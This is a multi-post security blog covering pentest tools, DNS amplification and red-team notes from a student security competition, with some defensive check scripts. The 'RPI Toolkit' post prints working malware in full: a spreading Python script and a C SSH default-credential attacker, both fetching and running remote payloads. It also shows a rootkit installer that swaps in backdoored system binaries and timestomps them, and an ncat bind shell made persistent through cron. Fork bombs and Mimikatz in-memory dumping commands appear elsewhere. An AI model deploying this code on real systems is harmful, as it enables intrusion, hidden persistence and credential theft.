Defensive ideas from offensive guys – Derbycon 2013

Derbycon 2013

Posted in InfoSec

smbexec fun

Just another blog post about the basics and tools I find useful.  If you’re a pentester and you’re not using SMBexec you might be wasting some time and missing out on a well written and very helpful tool.

smbexec is available here; it was written by Eric Milam (Brav0Hax) & Martin Bos (purehate_).

A few of the key features

  • Enumerate systems with domain admin logged in
  • Grab hashes
  • Dump cleartext credentials 
  • Pop shells

All done over SMB

Menu Layout

[Screenshots: Main Menu, Enumeration Menu, Exploitation Menu, Obtain Hashes Menu]

Simple example: the assumption is that you have already compromised a host, obtained an administrator hash, and plan to replay the hash against other hosts.

Identify Hosts

Identify hosts with SMB listening

Enumerate Shares

Enumerating Shares

Launching a Meterpreter session over SMB

Configuring Payload

Meterpreter Payload being built

Metasploit handler being launched

SMBExec Uploading and Executing

Sessions :-)

That should cover some basic usage. For extensive video tutorials, check out http://www.youtube.com/user/Brav0Hax/videos?view=0

Posted in InfoSec

DNS Amplification DoS Basics

Amplification-based DoS attacks are not a new concept; they were abused heavily in the 90s with IP directed broadcast attacks, also known as smurf attacks.

DNS amplification attacks rely on the fact that UDP DNS requests are small and easily spoofed, while the returned data is much larger than the original request and ends up hitting the victim's network.

Below is a sample dig request for Amazon.com

dig request amazon.com

Let's look at the packet size in Wireshark

DNS request 81 bytes

And the response

If you look at the request and response, the request was 81 bytes and the response was 879 bytes. With some quick research it wouldn't be hard to find other domains with a better rate of return; however, this is still a significant return on a small request.

Spoofing a DNS ALL request for ebay.com from 173.255.232.242 and capturing it in tshark.


This covers the basic theory of the attack.

Attackers spoof DNS requests from the victim's IP -> DNS servers respond with huge responses, filling the connection of the victim.

In the wild, DNS servers are often compromised and extremely large TXT records are configured, resulting in replies up to 4000 bytes and enhancing amplification.

Combine this entire attack with a botnet and it’s very easy to generate Gbps with relatively low traffic being sent from botnet nodes.

For more details on these attacks in the wild check out the defcon 14 talk by Randal Vaughn - http://www.youtube.com/watch?v=-mBzpMeiqec

Prevention

There are a number of methods to prevent your DNS servers from being abused in this way; the easiest is filtering recursive requests and rate limiting DNS traffic.

You can check for known open resolvers on your network here - http://openresolverproject.org/
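To check one of your own servers by hand, query it from a host outside your network and look at the flags dig prints. The helper below is an added example, not part of the original post: it classifies saved dig output, and the function names and the two sample replies are constructed for illustration.

```shell
#!/usr/bin/env bash
# classify_dig: read `dig` output on stdin and print one of
#   open-resolver <bytes>  recursion offered (ra flag) and an answer returned
#   refused                server declined the query
#   no-recursion           no ra flag, or no answer section
classify_dig() {
    awk '
        /->>HEADER<<-/ && match($0, /status: [A-Z]+/) {
            status = substr($0, RSTART + 8, RLENGTH - 8)
        }
        /^;; flags:/ {
            split($0, part, ";")                 # part[3] holds the flag list
            ra = (part[3] ~ /(^| )ra( |$)/)
            if (match($0, /ANSWER: [0-9]+/))
                answers = substr($0, RSTART + 8, RLENGTH - 8) + 0
        }
        /MSG SIZE/ { size = $NF }
        END {
            if (status == "REFUSED")       print "refused"
            else if (ra && answers > 0)    print "open-resolver " size
            else                           print "no-recursion"
        }'
}

# Constructed sample: header lines as dig prints them for a recursive answer.
sample_open_reply() {
    cat <<'EOF'
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4242
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1
;; MSG SIZE  rcvd: 879
EOF
}

# Constructed sample: a server that refuses recursion for outside clients.
sample_refused_reply() {
    cat <<'EOF'
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 4243
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; MSG SIZE  rcvd: 40
EOF
}
```

On a live check, pipe the real output in, for example `dig @192.0.2.53 example.com A | classify_dig`, where 192.0.2.53 stands in for your own server's address.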

Posted in InfoSec

ISTS – Defense


ISTS X

More info on the ISTS event here http://ists.sparsa.org

Some tips/tricks from a Red team member's point of view on improving defense.

You need to start this event keeping two important concepts in mind.

1.  You will get hacked.

2.  Your systems have multiple vulnerabilities by design.

Default Credentials

All passwords on all systems will be in some weak or default configuration; changing these immediately will help stop automated attacks.

Common System Misconfigurations

It’s common for a lot of teams to not have an understanding of the services currently running on their Linux machines. Issuing a quick “netstat -anp | grep LISTEN” as root will show open ports and the related process/program name.

VNC with no password

Red team viewing blue team machine over VNC

VNC can be configured with no password and give complete console access to the machine. In addition to no password, there have also been authentication bypass exploits, and it is often configured with a weak password.

Web Based Management Tools

Webmin (port 10000) and PHPMyAdmin are often used to remotely administer Linux machines. They can be configured with various authentication mechanisms, so this is another great place to look for default credentials.

Sudoers file

During the competition, and even at the beginning, be mindful of /etc/sudoers. This file controls who has access to sudo and the ability to run commands as root.

FTP Configuration Issues

FTP is often configured with anonymous FTP enabled, with versions that have known exploits, or allowing access to sensitive files.

During this year's competition it was configured to serve up /, and combined with the weak permissions it made accessing /etc/shadow and other sensitive files trivial.

MySQL root no password

MySQL configured with a root account and no password is a common configuration mistake but can lead to all kinds of fun things.


Incorrect permissions

Permissions on /etc/shadow allowed any user to view this file and allowed access to all the hashes.

These were dumped by a PHP backdoor with the user account www-data


Insecure Web Applications

There were a number of web vulnerabilities, including local file inclusion and multiple backdoors such as the c99 shell in shell.php.

This is an area that might take some work, using grep and other tools to look for insecure functions and obvious backdoors in web applications.
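One way to do that grep pass over a web root, as an added example that is not from the original post. The pattern lists, function names and the sample tree are assumptions for illustration; every hit still needs a manual look, since legitimate code uses some of these calls too.

```shell
#!/usr/bin/env bash
# Calls that web shells such as c99 lean on: command execution, dynamic eval,
# and decoders used to unpack an obfuscated payload. Tune the list per application.
RISKY_PHP='(^|[^[:alnum:]_])(eval|system|passthru|shell_exec|popen|proc_open|base64_decode|gzinflate)[[:space:]]*\('

# include/require fed straight from request data: the local file inclusion pattern.
LFI_PHP='(include|require)(_once)?[[:space:]]*\(?[[:space:]]*\$_(GET|POST|REQUEST|COOKIE)'

# scan_webroot DIR -> "file:line:text" for every risky call, for manual review
scan_webroot() {
    grep -rnEi --include='*.php' --include='*.phtml' --include='*.inc' "$RISKY_PHP" "$1" 2>/dev/null
}

# suspicious_files DIR -> sorted list of files with at least one risky call
suspicious_files() {
    grep -rlEi --include='*.php' --include='*.phtml' --include='*.inc' "$RISKY_PHP" "$1" 2>/dev/null | sort
}

# lfi_candidates DIR -> sorted list of files that include a request parameter
lfi_candidates() {
    grep -rlE --include='*.php' --include='*.phtml' --include='*.inc' "$LFI_PHP" "$1" 2>/dev/null | sort
}

# new_php_files DIR MINUTES -> PHP files whose inode changed in the last MINUTES
new_php_files() {
    find "$1" -type f -name '*.php' -cmin "-$2" 2>/dev/null | sort
}

# Constructed sample tree so the functions can be tried offline.
make_sample_webroot() {
    d=$(mktemp -d)
    mkdir -p "$d/app"
    printf '<?php echo "hello"; ?>\n' > "$d/index.php"
    printf '<?php eval(base64_decode($blob)); ?>\n' > "$d/app/shell.php"
    printf '<?php include($_GET["page"]); ?>\n' > "$d/app/view.php"
    echo "$d"
}

# When given a directory argument, print both lists for it.
if [ $# -gt 0 ]; then
    suspicious_files "$1"
    lfi_candidates "$1"
fi
```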


Scoring Engine Checks

The scoring engine checks the availability of many services by logging in with SSH/FTP.  Depending on the configuration of these accounts they usually had access to ssh and interactive login.

Even with normal user privileges there was still attack surface for denial of service attacks including filling up the hard drive with random files or launching a fork bomb.

perl -e “fork while fork” &

:(){ :|:& };:

cat /dev/urandom > randomfile &

These attacks can be mitigated by using the ulimit command and making changes to /etc/security/limits.conf

Windows Security

Patching

This shouldn’t need mentioning, but if you’re doing a CTF style event and you see an XP/2003 box there is a very good chance it's vulnerable to MS08-067, or if you come across Vista SP1/SP2 or Server 2008 you might want to look for MS09-050.

These exploits get popped quickly and you will be fighting a battle to remove any level of persistence by the red team or other teams.

Firewall

Enabling the Windows firewall to block 139/445 and other services that don’t need remote access will be critical.

Passwords

Once a machine is compromised, it's trivial to dump cleartext Windows passwords out of memory. Keep this in mind if you’re reusing the same admin password or password style across multiple machines.

It’s also extremely easy to dump the password hashes. Even if you used a complex password, teams can regain access by launching psexec over 445 and using the password hash to log in.

What now?

A few tips to get you started

Familiarize yourself with the various locations commands get launched from on boot. An example of this would be HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Be mindful of all temp directories and odd looking files.

Learn how to use the Sysinternals tools to detect backdoors. There are a number of great articles on detecting malware with Process Explorer, TCPView, and other Sysinternals tools.

Log files are your friend unless someone deletes them :-)

If you detect compromise, remember to rotate your Windows passwords quickly.

The last point is make sure you’re having fun

More details from another ISTS Redteam member can be found here - http://www.antitree.com/ists-x/

ISTS Redteam Reddit - http://www.reddit.com/r/istsredteam

Posted in InfoSec

RPI Toolkit – ISTS X

It’s my second year red teaming the ISTS event at RIT. ISTS is an event similar to CCDC where teams protect a network from the red team while doing business injects. The twist with ISTS is teams can play offense against each other.

Every year RPI does an amazing job with custom scripts and backdoors.

RPI 2012

Twitter1.py

import threading, subprocess, re, socket, time, sys

def list_ip():
    yield '127.0.0.1'
    first = int(sys.argv[1])
    second = int(sys.argv[2])
    for item in range(1,14):
        if item in [first, second]:
            continue
        for sub in [10, 20, 30]:
            yield '10.0.%s.%s' % (item, sub)

    for item in range(1,14):
        if item in [first, second]:
            continue
        try:
            yield socket.gethostbyname('priceofwales.team%s.ists' % item)
        except:
            pass
        try:
            yield socket.gethostbyname('missouri.team%s.ists' % item)
        except:
            pass

def get_ports():
    output = subprocess.check_output("netstat -l -t -n", shell=True)
    output = [x for x in output.split("\n") if 'unix' not in x]
    output = "\n".join(output)
    print output
    ports = [m.group(1) for m in re.finditer(':([0-9]+)', output)]
    print ports
    ports = map(int, ports)
    print ports
    for port in ports:
        if port >= 1024:
            yield port

def spawn_thread(ip, port):
    a = threading.Thread(target = attack_thread, args=(ip, port))
    a.start()

def attack_thread(ip, port):

    attack = """
mkdir /var/tmp
wget http://xxxxxxxx.cs.rpi.edu/~xxxxxxx/unlisted/debian-installer.sh -O /var/tmp/installer.sh
bash /var/tmp/installer.sh
rm /var/tmp/installer.sh
useradd -g 0 -G 0,1,2,3,4,6,10 -M util -p `mkpasswd rpisec412180`
useradd -g 0 -G 0,1,2,3,4,6,10 -M util
passwd --stdin rpisec412180
echo "util ALL=(ALL) ALL" >> /etc/sudoers
apt-get install openssh-server -y

wget http://dl.dropbox.com/u/xxxxxx/twitter_r.py -O /var/tmp/twitter_r.py
wget http://dl.dropbox.com/u/xxxxxx/get_access_token.py -O /var/tmp/get_access_token.py
wget http://dl.dropbox.com/u/xxxxxx/twitter.py -O /var/tmp/twitter.py

python /var/tmp/twitter_r.py &
sleep 1
rm /var/tmp/twitter_r.py
rm /var/tmp/twitter.py
rm /var/tmp/get_access_token.py

"""

    print ip, port
    sock = socket.create_connection((ip, port))
    sock.send(attack)
    while True:
        time.sleep(0)

def attack():
    for port in get_ports():
        for ip in list_ip():
            spawn_thread(ip, port)

if __name__ == "__main__":
    attack()

debian-installer.sh

#!/bin/sh
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/linux-agent -O /tmp/linux-agent -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/backdoored-utilities/debian/bin/ls -O /tmp/ls -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/lsdebian/bin/ps -O /tmp/ps -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/backdoored-utilities/debian/bin/rm -O /tmp/rm -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/backdoored-utilities/debian/bin/unlink -O /tmp/unlink -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/backdoored-utilities/debian/bin/top -O /tmp/top -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/backdoored-utilities/debian/lib/libproc-3.2.8.so -O /tmp/libproc-3.2.8.so -q
chmod 755 /tmp/ls
chmod 755 /tmp/ps
chmod 755 /tmp/rm
chmod 755 /tmp/unlink
chmod 755 /tmp/top
mv /tmp/ls /bin
mv /tmp/ps /bin
mv /tmp/rm /bin
mv /tmp/top /usr/bin
mv /tmp/unlink /usr/bin
mv /tmp/libproc-3.2.8.so /lib
touch -d "2008-04-04 10:22" /bin/ls
touch -d "2009-01-11 16:49" /bin/ps
touch -d "2008-04-04 10:22" /bin/rm
touch -d "2008-04-04 10:22" /usr/bin/unlink
touch -d "2009-01-11 16:49" /lib/libproc-3.2.8.so
touch -d "2009-01-11 16:49" /usr/bin/top
chmod 755 /tmp/linux-agent
mv /tmp/linux-agent "/sbin/dhclient3_1337_"
touch -d "2008-08-12 10:09" /sbin/dhclient3_1337_
/sbin/dhclient3_1337_
echo -e "\tpost-up /sbin/dhclient3_1337_" >> /etc/network/interfaces

2013 RPI stepped it up again.

After exploiting one of RPI's machines I was searching for useful data and pulled down a tarball containing

tar

Then downloaded all referenced files

Quick overview of files

a.out 64.out 32.out are compiled versions of main.c

aptpayload.txt and s.sh are dropped when main.c exploits a host with default credentials

inet, Packages, sources.list are all part of the aptpayload

The rest of the files are rc scripts for Metasploit, including SSH scanners and post exploitation with Metasploit persistence.

Here we go

main.c

#include <libssh/libssh.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

int kill(char * host, char * username);

int main()
{
 char host[256];
 int i;
 for (i = 1; i <= 7; i++) {
 sprintf(host, "10.0.%d.100", i);
 kill(host, "root");
 kill(host, "administrator");
 sprintf(host, "10.0.%d.101", i);
 kill(host, "root");
 kill(host, "administrator");
 }
 for (i = 8; i <= 12; i++) {
 sprintf(host, "10.0.%d.100", i);
 kill(host, "root");
 kill(host, "administrator");
 sprintf(host, "10.0.%d.101", i);
 kill(host, "root");
 kill(host, "administrator");
 }
 return 1;
}

int kill(char * host, char * username) {
 pid_t pid = fork();
 if (pid != 0) {
 return 1;
 }
 unsigned int nbytes;

ssh_session my_ssh_session = ssh_new();
 if (my_ssh_session == NULL) {
 printf("Error initializing ssh conn\n");
 exit(-1);
 }

ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, "192.168.0.149");

int rc = ssh_connect(my_ssh_session);
 if (rc != SSH_OK)
 {
 fprintf(stderr, "Error connecting to localhost: %s\n",
 ssh_get_error(my_ssh_session));
 exit(-1);
 }

rc = ssh_userauth_password(my_ssh_session, "root", "changeme");
 if (rc != SSH_AUTH_SUCCESS) {
 fprintf(stderr, "Error authenticating with password: %s\n",
 ssh_get_error(my_ssh_session));
 exit(-1);
 }

ssh_channel channel = ssh_channel_new(my_ssh_session);
 if (channel == NULL) {
 fprintf(stderr, "Error channel new creation: %s\n",
 ssh_get_error(my_ssh_session));
 exit(-1);
 }
 rc = ssh_channel_open_session(channel);
 if (rc != SSH_OK)
 {
 ssh_channel_free(channel);
 exit(-1);
 }
 rc = ssh_channel_request_exec(channel,
 "wget http://xxxxxx.cs.rpi.edu/~xxxxxxxxxx/ists/aptpayload.txt "
 "&& chmod +x aptpayload.txt && ./aptpayload.txt; rm aptpayload.txt; "
 "wget xxx.xxx.xxx.xxx/ists/s.sh && chmod +x s.sh && ./s.sh; rm ./s.sh");
 if (rc != SSH_OK)
 {
 ssh_channel_close(channel);
 ssh_channel_free(channel);
 exit(-1);
 }
 char buffer[256];
 nbytes = ssh_channel_read(channel, buffer, sizeof(buffer), 0);
 while (nbytes > 0)
 {
 if (write(1, buffer, nbytes) != nbytes)
 {
 ssh_channel_close(channel);
 ssh_channel_free(channel);
 exit(-1);
 }
 nbytes = ssh_channel_read(channel, buffer, sizeof(buffer), 0);
 }
 if (nbytes < 0)
 {
 ssh_channel_close(channel);
 ssh_channel_free(channel);
 exit(-1);
 }

ssh_channel_send_eof(channel);
 ssh_channel_close(channel);
 ssh_channel_free(channel);

ssh_disconnect(my_ssh_session);
 ssh_free(my_ssh_session);
 exit(0);
}

aptpayload.txt

#!/bin/bash
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 1A44B9C399E17A16
wget http://debianmirror.org/sources.list -O /etc/apt/sources.list
apt-get update
apt-get install -y inetutils-ping

s.sh


#!/bin/bash

chattr -i /tmp/session.sh
echo "ncat -l 57298 -e /bin/bash -k" > /bin/session.sh
chmod +x /bin/session.sh
chattr +i /bin/session.sh
/bin/session.sh &
chattr -i /etc/crontab
echo "" >> /etc/crontab
echo "" >> /etc/crontab
echo "* * * * * root /bin/session.sh > /dev/null 2>&1" >> /etc/crontab
chattr +i /etc/crontab

Quick strings on the replaced ping command

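From the blue team side, everything the 2012 and 2013 scripts above leave behind can be checked for directly. The audit below is an added example, not RPI's code and not part of the original post: the function names, the ROOT argument and the sample tree are assumptions, and the sample files are constructed to mirror the artifacts in the listings.

```shell
#!/usr/bin/env bash
# Each function takes ROOT ("/" on a live host, or a mounted image / test tree).

# Accounts other than root with UID 0 or primary GID 0 (the script used useradd -g 0).
root_equivalent_users() {
    awk -F: '($3 == 0 || $4 == 0) && $1 != "root" { print $1 }' "$1/etc/passwd"
}

# Non-root users granted unrestricted sudo, like the line appended to /etc/sudoers.
sudo_all_grants() {
    awk '!/^[ \t]*#/ && $1 != "root" && $1 !~ /^%/ &&
         /ALL[ \t]*=[ \t]*\(ALL(:ALL)?\)[ \t]*ALL/ { print $1 }' "$1/etc/sudoers"
}

# Commands /etc/crontab runs as root every minute.
every_minute_root_cron() {
    awk '$1=="*" && $2=="*" && $3=="*" && $4=="*" && $5=="*" && $6=="root" { print $7 }' "$1/etc/crontab"
}

# Programs hooked into interface bring-up (pre-up / up / post-up).
ifupdown_hooks() {
    awk '$1 ~ /^(pre-up|up|post-up)$/ { print $2 }' "$1/etc/network/interfaces"
}

# Files changed within the last MINUTES whose mtime claims otherwise:
# touch -d rewrites mtime, but ctime still records when the file was replaced.
backdated_files() {   # usage: backdated_files MINUTES DIR...
    mins=$1; shift
    find "$@" -xdev -type f -cmin "-$mins" ! -mmin "-$mins" 2>/dev/null | sort
}

audit_host() {        # usage: audit_host ROOT MINUTES
    root_equivalent_users "$1"  | sed 's/^/gid0-user: /'
    sudo_all_grants "$1"        | sed 's/^/sudo-all: /'
    every_minute_root_cron "$1" | sed 's/^/cron-1min: /'
    ifupdown_hooks "$1"         | sed 's/^/if-hook: /'
    backdated_files "$2" "$1/bin" "$1/sbin" "$1/usr/bin" "$1/lib" | sed 's/^/backdated: /'
}

# Constructed sample tree reproducing the artifacts, for trying the checks offline.
make_sample_root() {
    r=$(mktemp -d); mkdir -p "$r/etc/network" "$r/bin" "$r/sbin" "$r/usr/bin" "$r/lib"
    printf 'root:x:0:0::/root:/bin/bash\nutil:x:1001:0::/home/util:/bin/sh\n' > "$r/etc/passwd"
    printf 'root ALL=(ALL:ALL) ALL\n%%sudo ALL=(ALL:ALL) ALL\nutil ALL=(ALL) ALL\n' > "$r/etc/sudoers"
    printf '17 * * * * root run-parts /etc/cron.hourly\n* * * * * root /bin/session.sh > /dev/null 2>&1\n' > "$r/etc/crontab"
    printf 'iface eth0 inet dhcp\n\tpost-up /sbin/dhclient3_1337_\n' > "$r/etc/network/interfaces"
    : > "$r/bin/cat"; : > "$r/bin/ls"; touch -d '2008-04-04 10:22' "$r/bin/ls"
    echo "$r"
}
```

Some distributions ship system accounts with GID 0 and package upgrades also leave an old mtime with a fresh ctime, so treat each line of output as something to review, not as proof of compromise.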

A few thoughts for RPI and other teams

Be prepared to handle multiple operating systems; ISTS often changes operating systems at the last minute or without notice.

Work harder on protecting scripts/back doors and include obfuscation techniques.

A few of the MSF scripts had commands out of order and would have made it impossible for them to work properly.

Looking forward to what they bring out next year :-)

Posted in InfoSec

WCE and Mimikatz in memory over meterpreter

While hashes are great and passing the hash is an effective attack method, it never hurts to have plain text passwords. Companies tend to reuse passwords on various systems or use the same password style across their network.

Currently the two primary tools for doing this are WCE and Mimikatz; both methods will be shown over an existing meterpreter session.

First up, WCE the old way: dropping a binary

Uploading wce.exe over a meterpreter session

Dropping to shell and executing wce

As you can see this involves dropping a binary to the target machine.

This process was automated with a post exploitation script which uploads and executes wce. It can be found at http://pastebin.com/kQ41wLM7 and was written by @jabjorkhaug

Time to take a look at the execute command

-m looks like a fun option

Running in memory will give you a better chance of antivirus avoidance.

Let's try WCE again without dropping the binary

Launching WCE in memory from meterpreter

execute -H -i -c -m -d calc.exe -f /root/wce.exe -a  -w

Next up Mimikatz


Launching Mimikatz in memory from meterpreter

execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a  ‘”sekurlsa::logonPasswords full” exit’

While both of these are executed in memory, WCE writes a DLL to disk when it's running. Mubix has a detailed blog post on Mimikatz in memory; this gives Mimikatz a great advantage over WCE since it never touches disk.

More information on in-memory execution can be found here - Eternal Sunshine of the Spotless RAM

Mimikatz - http://blog.gentilkiwi.com/mimikatz

Mimikatz English version - https://github.com/thomhastings/mimikatz-en

Windows Credential Editor (WCE) - http://www.ampliasecurity.com/research.html

Metasploit - http://www.metasploit.com/download/

Posted in InfoSec

Let's try this again…

Firing up the blog again.

 

Trying to use this as a way to document things I find interesting.

Posted in Uncategorized